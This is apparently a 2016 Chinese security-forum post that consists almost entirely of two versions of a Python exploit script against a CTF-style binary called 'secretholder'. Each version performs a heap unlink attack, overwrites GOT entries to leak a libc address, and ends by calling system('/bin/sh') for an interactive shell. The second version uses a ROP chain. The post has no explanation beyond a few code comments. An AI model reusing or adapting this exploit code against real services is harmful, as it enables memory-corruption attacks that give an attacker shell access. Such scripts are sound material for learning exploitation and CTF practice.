-
-
[分享]xxxx
-
发表于:
2016-10-30 14:05
3472
-
版本1:
from minipwn import *
p32 = lambda x: struct.pack("<I", x)
p64 = lambda x: struct.pack("<Q", x)
u64 = lambda x: struct.unpack("<Q", x)[0]
small= 1
big = 2
huge = 3
s = remote('127.0.0.1', 55555)
def keep(level,buf='A'*8):
s.recvuntil('3. Renew secret\n')
s.send('1')
s.recvuntil('3. Huge secret\n')
s.send(str(level))
s.recvuntil('Tell me your secret: \n')
s.send(buf)
def wipe(level):
s.recvuntil('3. Renew secret\n')
s.send('2')
s.recvuntil('3. Huge secret\n')
s.send(str(level))
def renew(level, buf):
s.recvuntil('3. Renew secret\n')
s.send('3')
s.recvuntil('3. Huge secret\n')
s.send(str(level))
s.recvuntil('Tell me your secret: \n')
s.send(buf)
keep(huge)
wipe(huge)
keep(small)
keep(big)
wipe(small)
wipe(big)
phuge = 0x6020a8
fd = phuge-0x18
bk = phuge-0x10
# chunk 0 (unlinked)
payload = '\x00' * 0x10 + p64(fd) + p64(bk)
# chunk 1 (to be freed)
payload += p64(0x20) + p64(0x90)
payload += 'A' * 0x80
# chunk 2
payload += p64(0x0) + p64(0x11)
# chunk 3 (pre_inuse should be set 0x1 to make sure chunk 2 is not free, so that chunk 2 wont be unlinked)
payload += p64(0x0) + p64(0x11)
keep(huge,payload)
# unlink attack,then phuge == fd
wipe(big)
elf=ELF('/root/Desktop/secretholder')
got_atoi = elf.got['atoi']
got_free = elf.got['free']
# pbig phuge psmall
buf = '\x00' * 0x10 + p64(got_atoi) + p64(got_free) + p64(got_atoi) + p32(1)*3 #bigExists hugeExists smallExists
#here can only renew huge for small and big are all wiped, overwrite pbig phuge psmall
renew(huge, buf)
#overwrite free@got
plt_puts = elf.plt['puts']
renew(3, p64(plt_puts))
# call puts to leak atoi
wipe(big)
data = s.recvuntil('\n')[:-1]
libc_atoi = u64(data.ljust(8, '\x00'))
e=ELF('/lib/x86_64-linux-gnu/libc.so.6')
e.address=libc_atoi - e.symbols['atoi']
libc_system = e.address + e.symbols['system']
# overwrite atoi@got to address of system
renew(small,p64(libc_system))
s.send('sh\x00')
s.interactive()
版本2:
from minipwn import *
p32 = lambda x: struct.pack("<I", x)
p64 = lambda x: struct.pack("<Q", x)
u64 = lambda x: struct.unpack("<Q", x)[0]
small= 1
big = 2
huge = 3
s = remote('127.0.0.1', 55555)
def keep(level):
s.recvuntil('3. Renew secret')
s.send('1')
s.recvuntil('3. Huge secret')
s.send(str(level))
s.recvuntil('Tell me your secret: ')
s.send('A'*8)
def wipe(level):
s.recvuntil('3. Renew secret')
s.send('2')
s.recvuntil('3. Huge secret')
s.send(str(level))
def renew(level, buf):
s.recvuntil('3. Renew secret')
s.send('3')
s.recvuntil('3. Huge secret')
s.send(str(level))
s.recvuntil('Tell me your secret: ')
s.send(buf)
keep(huge)
wipe(huge)
keep(small)
wipe(small)
keep(huge)
wipe(small)
keep(small)
keep(big)
psmall = 0x6020B0
fd=psmall-0x18
bk=psmall-0x10
buf = '\x00' * 0x10 + p64(fd) + p64(bk) + p64(0x20) + p64(0xfb0)
renew(huge, buf)
wipe(big)
elf=ELF('/root/Desktop/secretholder')
memset_got = elf.got['memset']
stack_fail_got = elf.got['__stack_chk_fail']
p_ret = 0x400691
p_read_a_lot = 0x4009F9
buf = '\x00' * 8 + p64(memset_got) + p64(0) + p64(stack_fail_got) + p32(1) # p32(1) is bigExists
renew(1, buf)
renew(1, p64(p_ret))
renew(2, p64(p_read_a_lot))
p_pop_rdi = 0x400e03
puts_plt = elf.plt['puts']
p_main = 0x400cc2
start_main_got = elf.got['__libc_start_main']
print hex(start_main_got)
buf = '\x00' * 0x18 +p64(p_pop_rdi) + p64(start_main_got) + p64(puts_plt) + p64(p_main)
s.send(buf)
s.recvuntil('3. Renew secret\n')
data = s.recvuntil('\n')[:-1]
__libc_start_main = u64(data.ljust(8, '\x00'))
e=ELF('/lib/x86_64-linux-gnu/libc.so.6')
e.address=__libc_start_main-e.symbols['__libc_start_main']
libc_system = e.address + e.symbols['system']
libc_sh = e.search('/bin/sh')
#execute system('/bin/sh')
buf = '\x00' * 0x18 + p64(p_pop_rdi) + p64(libc_sh) + p64(libc_system)
s.recvuntil('3. Renew secret')
s.send(buf)
s.interactive()
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!